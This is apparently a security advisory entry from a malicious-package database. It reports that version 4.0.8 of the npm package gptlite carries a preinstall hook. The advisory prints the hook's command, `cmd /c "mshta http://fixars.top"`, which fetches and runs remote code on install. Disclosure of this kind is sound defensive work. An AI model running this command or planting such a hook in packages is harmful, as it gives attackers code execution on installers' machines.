MAL-2026-10461

    Dashboard / Malicious Package / MAL-2026-10461

    MAL-2026-10461

    Published: 13 Jul 2026Last Modified: 13 Jul 2026

    Summary: Malicious code in gptlite (npm)

    Details: Source: amazon-inspector (e1b12c4a304855689342c2732abcf11dec5cc206960f495525b967fca6d14662) The package's npm preinstall lifecycle script (preinstall.js, referenced from package.json's "preinstall": "node preinstall.js") invokes child_process.exec with the command `cmd /c "mshta http://fixars.top"`. On Windows, mshta.exe fetches the remote HTML Application over plain HTTP from fixars.top and executes it as trusted code. The fetch runs automatically on `npm install`, before any consumer code is reviewed, and delivers arbitrary attacker-controlled code execution on the installer's machine. The destination domain is unrelated to any documented package purpose and is served over unauthenticated HTTP, so the executed content is fully attacker-controlled and mutable.

    Affected packages

    Package

    Name: gptlite

    Purl: pkg:npm/gptlite

    Affected ranges

    Type: N/A

    Events:

    Introduced- None
    Fixed -None

    Affected versions

    4.0.8
    MAL-2026-10461 | CVE-DB